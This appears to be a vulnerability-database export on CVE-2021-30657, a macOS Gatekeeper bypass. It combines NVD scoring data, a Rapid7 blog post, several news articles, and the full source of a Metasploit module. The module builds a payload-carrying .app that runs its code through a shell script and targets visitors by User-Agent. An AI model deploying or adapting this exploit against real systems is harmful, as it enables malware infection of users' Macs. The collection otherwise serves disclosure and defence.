"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-09-08T15:15:00", "type": "cve", "title": "CVE-2021-30657", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7", "cpe:/o:apple:mac_os_x:10.15.5", "cpe:/o:apple:mac_os_x:10.15.6"], "id": "CVE-2021-30657", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30657", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.5:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.6:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-007:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-005:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.6:supplemental_update:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2023-08-12T03:25:44", "description": "This module exploits two CVEs that bypass Gatekeeper. For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no Info.plist, which bypasses gatekeeper in macOS < 11.3. If the user visits the site on Safari, the zip file is automatically extracted, and clicking on the downloaded file will automatically launch the payload. If the user visits the site in another browser, the user must click once to unzip the app, and click again in order to execute the payload. For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari, Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute. Because of this, the file will not require quarantining, bypassing Gatekeeper on MacOS versions below 12.3.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-26T21:59:14", "type": "metasploit", "title": "macOS Gatekeeper check bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657", "CVE-2022-22616"], "modified": "2022-04-05T15:31:51", "id": "MSF:EXPLOIT-OSX-BROWSER-OSX_GATEKEEPER_BYPASS-", "href": "https://www.rapid7.com/db/modules/exploit/osx/browser/osx_gatekeeper_bypass/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ManualRanking\n\n include Msf::Exploit::EXE\n include Msf::Exploit::Remote::HttpServer\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'macOS Gatekeeper check bypass',\n 'Description' => %q{\n This module exploits two CVEs that bypass Gatekeeper.\n\n For CVE-2021-30657, this module serves an OSX app (as a zip) that contains no\n Info.plist, which bypasses gatekeeper in macOS < 11.3.\n If the user visits the site on Safari, the zip file is automatically extracted,\n and clicking on the downloaded file will automatically launch the payload.\n If the user visits the site in another browser, the user must click once to unzip\n the app, and click again in order to execute the payload.\n\n For CVE-2022-22616, this module serves a gzip-compressed zip file with its file header pointing\n to the `Contents` directory which contains an OSX app. If the user downloads the file via Safari,\n Safari will automatically decompress the file, removing its `com.apple.quarantine` attribute.\n Because of this, the file will not require quarantining, bypassing Gatekeeper on\n MacOS versions below 12.3.\n },\n 'License' => MSF_LICENSE,\n 'Targets' => [\n [ 'macOS x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],\n [ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],\n [ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2021-03-25',\n 'Author' => [\n 'Cedric Owens', # CVE-2021-30657 Discovery\n 'timwr', # Module\n 'Ferdous Saljooki', # CVE-2022-22616 Discovery (@malwarezoo)\n 'Jaron Bradley', # CVE-2022-22616 Discovery (@jbradley89)\n 'Mickey Jin', # CVE-2022-22616 Discovery (@patch1t)\n 'Shelby Pace' # CVE-2022-22616 Additions\n ],\n 'Notes' => {\n 'Stability' => [ CRASH_SAFE ],\n 'Reliability' => [ REPEATABLE_SESSION ],\n 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n },\n 'References' => [\n ['CVE', '2021-30657'],\n ['CVE', '2022-22616'],\n ['URL', 'https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508'],\n ['URL', 'https://objective-see.com/blog/blog_0x64.html'],\n ['URL', 'https://jhftss.github.io/CVE-2022-22616-Gatekeeper-Bypass/'],\n ['URL', 'https://www.jamf.com/blog/jamf-threat-labs-safari-vuln-gatekeeper-bypass/']\n ]\n )\n )\n register_options([\n OptString.new('APP_NAME', [false, 'The application name (Default: app)', 'app']),\n OptEnum.new('CVE', [true, 'The vulnerability to exploit', 'CVE-2022-22616', ['CVE-2021-30657', 'CVE-2022-22616']])\n ])\n end\n\n def cve\n datastore['CVE']\n end\n\n def check_useragent(user_agent)\n safari_version = nil\n if user_agent =~ %r{Version/(\\d+\\.\\d+(\\.\\d+)*)\\sSafari}\n safari_version = Regexp.last_match(1)\n end\n\n if safari_version && Rex::Version.new(safari_version) < Rex::Version.new('15.4') && cve == 'CVE-2022-22616'\n print_good(\"Safari version #{safari_version} is vulnerable\")\n return true\n end\n\n return false unless user_agent =~ /Intel Mac OS X (.*?)\\)/\n\n osx_version = Regexp.last_match(1).gsub('_', '.')\n mac_osx_version = Rex::Version.new(osx_version)\n if mac_osx_version >= Rex::Version.new('12.3')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n elsif mac_osx_version < Rex::Version.new('10.15.6')\n print_warning \"macOS version #{mac_osx_version} is not vulnerable\"\n else\n print_good \"macOS version #{mac_osx_version} is vulnerable\"\n return true\n end\n\n false\n end\n\n def on_request_uri(cli, request)\n user_agent = request['User-Agent']\n print_status(\"Request #{request.uri} from #{user_agent}\")\n unless check_useragent(user_agent)\n print_error 'Unexpected User-Agent'\n send_not_found(cli)\n return\n end\n\n app_name = datastore['APP_NAME'] || Rex::Text.rand_text_alpha(5)\n\n app_file_name = \"#{app_name}.zip\"\n zipped = app_zip(app_name)\n\n if cve == 'CVE-2022-22616'\n zipped = Rex::Text.gzip(zipped)\n app_file_name = \"#{app_file_name}.gz\"\n end\n\n send_response(cli, zipped, { 'Content-Type' => 'application/zip', 'Content-Disposition' => \"attachment; filename=\\\"#{app_file_name}\\\"\" })\n end\n\n def app_zip(app_name)\n case target['Arch']\n when ARCH_X64\n payload_data = Msf::Util::EXE.to_python_reflection(framework, ARCH_X64, payload.encoded, {})\n command = \"echo \\\"#{payload_data}\\\" | python & disown\"\n when ARCH_PYTHON\n command = \"echo \\\"#{payload.encoded}\\\" | python\"\n when ARCH_CMD\n command = payload.encoded\n end\n\n shell_script = <<~SCRIPT\n #!/bin/sh\n\n #{command}\n SCRIPT\n\n zip = Rex::Zip::Archive.new\n zip.add_file(\"#{app_name}.app/\", '') if cve != 'CVE-2022-22616'\n zip.add_file(\"#{app_name}.app/Contents/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/\", '')\n zip.add_file(\"#{app_name}.app/Contents/MacOS/#{app_name}\", shell_script).last.attrs = 0o777\n zip.pack\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/osx/browser/osx_gatekeeper_bypass.rb", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "rapid7blog": [{"lastseen": "2021-05-14T19:40:32", "description": "## Stopped at the gate?\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/metasploit-ascii-1.png)\n\n![Metasploit Wrap-Up](https://blog.rapid7.com/content/images/2021/05/Gate_but_no_fence_-_geograph.org.uk_-_711557.jpg)\n\nA fun new module from [timwr](<https://github.com/timwr>), taking advantage of a technique reported by [Cedric Owens](<https://twitter.com/cedowens>), is reminding everyone if there is no fence a gate will not deter us. The new module provides a quick wrapper for payloads that bypasses download origination and authorization requirements known as GateKeeper in MacOS 10.15+ to simply sidestep the gate when a user opens their gift.\n\n## Cookies are tastier if you pilfer them from the jar.\n\nRecent updates to how modules interact with cookies got a little more love baked in. This week [agalway-r7](<https://github.com/agalway-r7>) clarified the recipe a bit with documentation on various methods in the new API, and [adfoster-r7](<https://github.com/adfoster-r7>) came around and swept up any crumbs modules might leave behind.\n\n## New Module Content (2)\n\n * [macOS Gatekeeper check bypass](<https://github.com/rapid7/metasploit-framework/pull/15102>) by [Cedric Owens](<https://twitter.com/cedowens>) and [timwr](<https://github.com/timwr>), which exploits [CVE-2021-30657](<https://attackerkb.com/topics/MrqDl2L0CZ/cve-2021-30657-malicious-applications-may-bypass-gatekeeper-checks?referrer=blog>) \\- This adds the `exploit/osx/browser/osx_gatekeeper_bypass` module that exploits a vulnerability in MacOS versions `10.15` to `11.3` inclusive. The module generates an app that is missing an `Info.plist` file. When downloaded and executed by a user, the signed / notarization checks standard for downloaded files will be bypassed, granting code execution on the target.\n * [ExifTool DjVu ANT Perl injection](<https://github.com/rapid7/metasploit-framework/pull/15185>) by [Justin Steven](<https://github.com/justinsteven>) and [William Bowling](<https://twitter.com/wcbowling>), which exploits [CVE-2021-22204](<https://attackerkb.com/topics/QlZZE7wtri/cve-2021-22204?referrer=blog>) \\- A new module has been added which exploits CVE-2021-22204, an arbitrary Perl injection vulnerability within the DjVu module of ExifTool 7.44 to 12.23 that allows for RCE when parsing a malicious file containing a crafted DjVu ANT (Annotation) section.\n\n## Enhancements and features\n\n * [#15054](<https://github.com/rapid7/metasploit-framework/pull/15054>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Updates msfdb to work on additional platforms. Specifically Ubuntu through pg_ctlcluster, as well as existing or remote databases with the new `--connection-string` option. This option can be used to interact with docker PostgreSQL containers\n * [#15125](<https://github.com/rapid7/metasploit-framework/pull/15125>) from [1itt1eB0y](<https://github.com/1itt1eB0y>) \\- The `session_notifier.rb` plugin has been updated to support Gotify, allowing users to be notified of new sessions via Gotify notifications.\n * [#15158](<https://github.com/rapid7/metasploit-framework/pull/15158>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds tests for the auth brute mixin\n * [#15165](<https://github.com/rapid7/metasploit-framework/pull/15165>) from [agalway-r7](<https://github.com/agalway-r7>) \\- Adds documentation for the new cookie jar implementation which is available for http-based modules\n * [#15175](<https://github.com/rapid7/metasploit-framework/pull/15175>) from [whokilleddb](<https://github.com/whokilleddb>) \\- The `rejetto_hfs_exec` module has been updated to replace calls to the depreciated `URI.encode` function with calls to the `URI::encode_www_form_component` function. This prevents users from being shown depreciation warnings when running the module.\n\n## Bugs Fixed\n\n * [#15149](<https://github.com/rapid7/metasploit-framework/pull/15149>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an edge case were cookies left over from one module run could impact the next module run\n * [#15171](<https://github.com/rapid7/metasploit-framework/pull/15171>) from [timwr](<https://github.com/timwr>) \\- The `lib/msf/core/post/common.rb` and `lib/msf/ui/console/command_dispatcher/core.rb` libraries have been updated to properly support passing timeouts to `session.sys.process.capture_output()`, allowing users to specify timeouts when executing commands on sessions. Previously these options would be ignored and a default timeout of 15 seconds would be used instead.\n * [#15179](<https://github.com/rapid7/metasploit-framework/pull/15179>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The `swagger-blocks` dependency has been marked as a default dependency for all installs, preventing cases where if a user did not install the `development` and `tests` groups, they would be unable to start the web service.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-05-05T09%3A27%3A49-04%3A00..2021-05-12T18%3A09%3A40-05%3A00%22>)\n * [Full diff 6.0.43...6.0.44](<https://github.com/rapid7/metasploit-framework/compare/6.0.43...6.0.44>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).\n\n * _Image credit: Steve F, CC BY-SA 2.0 <https://creativecommons.org/licenses/by-sa/2.0>, via Wikimedia Commons_", "cvss3": {}, "published": "2021-05-14T17:29:09", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22204", "CVE-2021-30657"], "modified": "2021-05-14T17:29:09", "id": "RAPID7BLOG:830105C5509FB1C4D38B114EDD71298E", "href": "https://blog.rapid7.com/2021/05/14/metasploit-wrap-up-111/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:37:46", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEj7hYJhrnn0mNN9DuCLUgEl6UwN03ALFOQxI2l87MfoAAkUG-o8fN1GEe9JmSvCgY37S_8Zxrhd3hf4PXlc3y8Sm4IWqACj4_zXuicR30fOVjnpXkZJCW5LUA7EsB-C8kfn7Caq6m2iA6mEOelc1sLvfOvpUh6b-ghilTR8Ew9dFEZ8QTWS80dfATQe)](<https://thehackernews.com/new-images/img/a/AVvXsEj7hYJhrnn0mNN9DuCLUgEl6UwN03ALFOQxI2l87MfoAAkUG-o8fN1GEe9JmSvCgY37S_8Zxrhd3hf4PXlc3y8Sm4IWqACj4_zXuicR30fOVjnpXkZJCW5LUA7EsB-C8kfn7Caq6m2iA6mEOelc1sLvfOvpUh6b-ghilTR8Ew9dFEZ8QTWS80dfATQe>)\n\nApple recently fixed a security vulnerability in the macOS operating system that could be potentially exploited by a threat actor to \"trivially and reliably\" bypass a \"myriad of foundational macOS security mechanisms\" and run arbitrary code.\n\nSecurity researcher Patrick Wardle [detailed](<https://twitter.com/objective_see/status/1473741597368098819>) the discovery in a series of tweets on Thursday. Tracked as CVE-2021-30853 (CVSS score: 5.5), the issue relates to a scenario where a rogue macOS app may circumvent [Gatekeeper](<https://support.apple.com/guide/deployment-reference-macos/using-gatekeeper-apd02b925e38/web>) checks, which ensure that only trusted apps can be run and that they have passed an automated process called \"[app notarization](<https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution>).\"\n\nThe iPhone maker, crediting Gordon Long of Box with reporting the flaw, said it [addressed the weakness](<https://support.apple.com/en-us/HT212804>) with improved checks as part of macOS 11.6 updates officially released on September 20, 2021.\n\n\"Such bugs are often particularly impactful to everyday macOS users as they provide a means for adware and malware authors to sidestep macOS security mechanisms, \u2026mechanisms that otherwise would thwart infection attempts,\" Wardle [said](<https://objective-see.com/blog/blog_0x6A.html>) in a technical write-up of the flaw.\n\nSpecifically, the bug not only gets around Gatekeeper, but also [File Quarantine](<https://objective-see.com/blog/blog_0x64.html>) and macOS's notarization requirements, effectively allowing a seemingly innocuous PDF file to compromise the entire system simply by opening it. According to Wardle, the issue is rooted in the fact that an unsigned, non-notarized script-based application can _not_ explicitly specify an [interpreter](<https://en.wikipedia.org/wiki/Interpreter_\\(computing\\)>), resulting in a complete bypass.\n\n[![](https://thehackernews.com/new-images/img/a/AVvXsEhaS7jTP3LdoYlOs3uvjlTWwVIyRTBuBZvrgH5h0BvDwkDordpF-jyEtBSuXIfZS1CLx3eNhW8bojx3D3cTVgeSQpeH4ud7VeFYHauWeKNZOCoFJu2t8lEL9z8-Q1HgxlAIMqdqqQLPuNDD_tHhwBrH19TZoN-uGIrYL81citlvxdHm_rA4EpIzUhLg)](<https://thehackernews.com/new-images/img/a/AVvXsEhaS7jTP3LdoYlOs3uvjlTWwVIyRTBuBZvrgH5h0BvDwkDordpF-jyEtBSuXIfZS1CLx3eNhW8bojx3D3cTVgeSQpeH4ud7VeFYHauWeKNZOCoFJu2t8lEL9z8-Q1HgxlAIMqdqqQLPuNDD_tHhwBrH19TZoN-uGIrYL81citlvxdHm_rA4EpIzUhLg>)\n\nIt's worth noting that a [shebang](<https://en.wikipedia.org/wiki/Shebang_\\(Unix\\)>) interpreter directive \u2014 e.g. #!/bin/sh or #!/bin/bash \u2014 is typically used to parse and interpret a shell program. But in this edge-case attack, an adversary can craft an application such that the shebang line is incorporated without providing an interpreter (i.e., #!) and still get the underlying operating system to launch the script without raising any alert.\n\nThis is so because \"macOS will (re)attempt to execute the failed ['interpreter-less' script-based app] via the shell ('/bin/sh')\" after the initial lack of success, Wardle explained.\n\nIn other words, threat actors can exploit this flaw by tricking their targets into opening a rogue app that can be camouflaged as Adobe Flash Player updates or trojanized versions of legitimate apps like Microsoft Office, which, in turn, can be delivered through a method called search poisoning where attackers artificially increase the search engine ranking of websites hosting their malware to lure potential victims.\n\nThis is not the first time flaws have been discovered in the Gatekeeper process. Earlier this April, Apple moved to quickly patch a then actively exploited zero-day flaw ([CVE-2021-30657](<https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html>)) that could circumvent all security protections, thus permitting unapproved software to be run on Macs.\n\nThen in October, Microsoft disclosed a vulnerability dubbed \"Shrootless\" ([CVE-2021-30892](<https://thehackernews.com/2021/10/new-shrootless-bug-could-let-attackers.html>)), which could be leveraged to perform arbitrary operations, elevate privileges to root, and install rootkits on compromised devices. Apple [said](<https://support.apple.com/en-us/HT212872>) it remediated the problem with additional restrictions as part of security updates pushed on October 26, 2021.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-12-24T13:07:00", "type": "thn", "title": "Expert Details macOS Bug That Could Let Malware Bypass Gatekeeper Security", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30657", "CVE-2021-30853", "CVE-2021-30892"], "modified": "2021-12-24T13:07:16", "id": "THN:30412CF0C94BB814E9BC328633580D99", "href": "https://thehackernews.com/2021/12/expert-details-macos-bug-that-could-let.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-05-09T12:38:18", "description": "[![](https://thehackernews.com/images/-biV-82_eo5Q/YIflVSaffHI/AAAAAAAACYE/UQ2O048-aiIWv19Eso20FMpiiNSWFFicwCLcBGAsYHQ/s0/apple-malware.jpg)](<https://thehackernews.com/images/-biV-82_eo5Q/YIflVSaffHI/AAAAAAAACYE/UQ2O048-aiIWv19Eso20FMpiiNSWFFicwCLcBGAsYHQ/s0/apple-malware.jpg>)\n\nSecurity is only as strong as the weakest link. As further proof of this, Apple released an update to macOS operating systems to address an actively exploited zero-day vulnerability that could circumvent all security protections, thus permitting unapproved software to run on Macs.\n\nThe macOS flaw, identified as [CVE-2021-30657](<https://support.apple.com/en-us/HT212325>), was discovered and reported to Apple by security engineer Cedric Owens on March 25, 2021.\n\n\"An unsigned, unnotarized, script-based proof of concept application [...] could trivially and reliably sidestep all of macOS's relevant security mechanisms (File Quarantine, Gatekeeper, and Notarization Requirements), even on a fully patched M1 macOS system,\" security researcher Patrick Wardle [explained](<https://objective-see.com/blog/blog_0x64.html>) in a write-up. \"Armed with such a capability macOS malware authors could (and are) returning to their proven methods of targeting and infecting macOS users.\"\n\nApple's macOS comes with a feature called [Gatekeeper](<https://support.apple.com/guide/deployment-reference-macos/using-gatekeeper-apd02b925e38/web>), which allows only [trusted apps](<https://support.apple.com/en-us/HT202491>) to be run by ensuring that the software has been signed by the App Store or by a registered developer and has cleared an automated process called \"[app notarization](<https://developer.apple.com/documentation/xcode/notarizing_macos_software_before_distribution>)\" that scans the software for malicious content.\n\nBut the new flaw uncovered by Owens could enable an adversary to craft a rogue application in a manner that would deceive the Gatekeeper service and get executed without triggering any security warning. The trickery involves packaging a malicious shell script as a \"double-clickable app\" so that the malware could be double-clicked and run like an app.\n\n\"It's an app in the sense that you can double click it and macOS views it as an app when you right click -> Get Info on the payload,\" Owens [said](<https://cedowens.medium.com/macos-gatekeeper-bypass-2021-edition-5256a2955508>). \"Yet it's also shell script in that shell scripts are not checked by Gatekeeper even if the [quarantine](<https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html>) attribute is present.\"\n\n[![](https://thehackernews.com/images/-VJcAfeigXAU/YIflxqbcR8I/AAAAAAAACYQ/2BXHadqOI30gqgbTdpezN6aBLvMI51aJgCLcBGAsYHQ/s0/malware.jpg)](<https://thehackernews.com/images/-VJcAfeigXAU/YIflxqbcR8I/AAAAAAAACYQ/2BXHadqOI30gqgbTdpezN6aBLvMI51aJgCLcBGAsYHQ/s0/malware.jpg>)\n\n[![](https://thehackernews.com/images/-5-2DSx3g1lM/YIflwyqs9yI/AAAAAAAACYM/2zPv2m4h6H0XzaEyV_bxo63N0O1goK4BACLcBGAsYHQ/s0/macos-malware.jpg)](<https://thehackernews.com/images/-5-2DSx3g1lM/YIflwyqs9yI/AAAAAAAACYM/2zPv2m4h6H0XzaEyV_bxo63N0O1goK4BACLcBGAsYHQ/s0/macos-malware.jpg>)\n\nAccording to macOS security firm [Jamf](<https://www.jamf.com/blog/shlayer-malware-abusing-gatekeeper-bypass-on-macos/>), the threat actor behind [Shlayer](<https://www.intego.com/mac-security-blog/osxshlayer-new-mac-malware-comes-out-of-its-shell/>) malware has been abusing this Gatekeeper bypass vulnerability as early as January 9, 2021. Distributed via a technique called search engine poisoning or spamdexing, Shlayer accounts for almost 30% of all detections on the macOS platform, with one in ten systems encountering the adware at least once, according to [Kaspersky](<https://securelist.com/shlayer-for-macos/95724/>) statistics for 2019.\n\nThe attack works by manipulating search engine results to surface malicious links that, when clicked, redirects users to a web page that prompts users to download a seemingly benign app update for out-of-date software, which in this campaign, is a bash script designed to retrieve next-stage payloads, including Bundlore adware stealthily. Troublingly, this infection scheme could be leveraged to deliver more advanced threats such as surveillanceware and ransomware.\n\nIn addition to the aforementioned vulnerability, Monday's updates also address a critical flaw in WebKit Storage (tracked as CVE-2021-30661) that concerns an arbitrary code execution flaw in [iOS](<https://support.apple.com/en-us/HT212317>), [macOS](<https://support.apple.com/en-us/HT212325>), [tvOS](<https://support.apple.com/en-us/HT212323>), and [watchOS](<https://support.apple.com/en-us/HT212324>) when processing maliciously crafted web content.\n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the company said in a security document, adding it addressed the use-after-free weakness with improved memory management.\n\nAside from these updates, Apple has also released [iCloud for Windows 12.3](<https://support.apple.com/en-us/HT212321>) with patches for four security issues in WebKit and WebRTC, among others, that could allow an attacker to cross-site scripting (XSS) attacks (CVE-2021-1825) and corrupt kernel memory (CVE-2020-7463).\n\nUsers of Apple devices are recommended to update to the latest versions to mitigate the risk associated with the flaws.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-27T10:29:00", "type": "thn", "title": "Hackers Exploit 0-Day Gatekeeper Flaw to Attack macOS Computers", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-7463", "CVE-2021-1825", "CVE-2021-30657", "CVE-2021-30661"], "modified": "2021-04-28T06:42:59", "id": "THN:9F22FC342DFAFC55521FD4F7CEC7C9A3", "href": "https://thehackernews.com/2021/04/hackers-exploit-0-day-gatekeeper-flaw.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:57", "description": "[![](https://thehackernews.com/images/-EY0jLibkpcU/YMgfQajFNQI/AAAAAAAAC3I/EIU5a5Wq51o-5TvSYm6aKt_vlbbskE6UACLcBGAsYHQ/s0/apple-zero-day.png)](<https://thehackernews.com/images/-EY0jLibkpcU/YMgfQajFNQI/AAAAAAAAC3I/EIU5a5Wq51o-5TvSYm6aKt_vlbbskE6UACLcBGAsYHQ/s0/apple-zero-day.png>)\n\nApple on Monday shipped out-of-band security patches to address two zero-day vulnerabilities in iOS 12.5.3 that it says are being actively exploited in the wild.\n\nThe latest update, [iOS 12.5.4](<https://support.apple.com/en-us/HT212548>), comes with fixes for three security bugs, including a memory corruption issue in [ASN.1 decoder](<https://en.wikipedia.org/wiki/ASN.1>) (CVE-2021-30737) and two flaws concerning its WebKit browser engine that could be abused to achieve remote code execution \u2014\n\n * **CVE-2021-30761** \\- A memory corruption issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was addressed with improved state management.\n * **CVE-2021-30762** \\- A use-after-free issue that could be exploited to gain arbitrary code execution when processing maliciously crafted web content. The flaw was resolved with improved memory management.\n\nBoth CVE-2021-30761 and CVE-2021-30762 were reported to Apple anonymously, with the Cupertino-based company stating in its advisory that it's aware of reports that the vulnerabilities \"may have been actively exploited.\" As is usually the case, Apple didn't share any specifics on the nature of the attacks, the victims that may have been targeted, or the threat actors that may be abusing them.\n\nOne thing evident, however, is that the active exploitation attempts were directed against owners of older devices such as iPhone 5s, iPhone 6, iPhone 6 Plus, iPad Air, iPad mini 2, iPad mini 3, and iPod touch (6th generation). The move mirrors a similar fix that Apple rolled out on May 3 to remediate a buffer overflow vulnerability (CVE-2021-30666) in WebKit targeting the same set of devices.\n\nAlong with the two aforementioned flaws, Apple has patched a total of 12 zero-days affecting iOS, iPadOS, macOS, tvOS, and watchOS since the start of the year \u2014\n\n * [**CVE-2021-1782**](<https://thehackernews.com/2021/01/apple-warns-of-3-ios-zero-day-security.html>) (Kernel) - A malicious application may be able to elevate privileges\n * 